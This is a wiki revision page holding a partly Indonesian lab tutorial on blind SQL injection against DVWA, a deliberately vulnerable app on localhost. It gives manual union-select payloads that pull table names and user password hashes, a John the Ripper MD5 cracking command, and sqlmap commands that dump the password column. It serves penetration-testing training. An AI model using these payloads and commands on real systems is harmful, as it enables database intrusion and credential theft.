Difference between revisions of "DVWA: SQLi blind"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
| Line 50: | Line 50: | ||
Lakukan di terminal, | Lakukan di terminal, | ||
| − | root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; | + | root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns |
| − | |||
--> "security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string=" | --> "security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string=" | ||
| Line 59: | Line 58: | ||
lihat tables | lihat tables | ||
| − | root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; | + | root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -D dvwa --tables |
| − | |||
lihat kolom di user tabel | lihat kolom di user tabel | ||
| − | root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; | + | root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns |
| − | |||
lihat field password & dump | lihat field password & dump | ||
| − | root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; | + | root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -C password --dump |
| − | |||
Revision as of 07:43, 4 March 2017
DVWA-BLIND SQL INJECTION : LOW Level
1. Open Local host http://localhost/dvwa
Username : Admin Password : Password
3.Select SQL Injection BLIND and column ID issued
1' and 1=1# 1' and 1=1 order by 2 #
5.ID: 'or' 1=1--
we can see there are 5 user
5. now see information table
1' and 1=0 union select null,table_name from information_schema.tables# 1' and 1=0 union select null,table_name from information_schema.columns where table_name='users #
7. Information table name from table user
1' and 1=0 union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users #
8. on the last lets see user name and password
1' and 1=0 union select null,concat(first_name,0x0a,password) from users #
9. we will crack the md5 password
copy the passowrd into kwrite and save with name hash next
root@bt:/pentest/passwords/john#./john --format=raw-md5 hash
OK GOOD LUCK
Ok next lesson .. I will explain How to Exploit DVWA using Sqlmap.
1. afer login in DVWA and choose DVWA Securty Low 2. follow this picture
In User ID write '1
than show
Lakukan di terminal,
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
--> "security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="
di peroleh dari addon tamer di browser.
lihat tables
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -D dvwa --tables
lihat kolom di user tabel
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
lihat field password & dump
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -C password --dump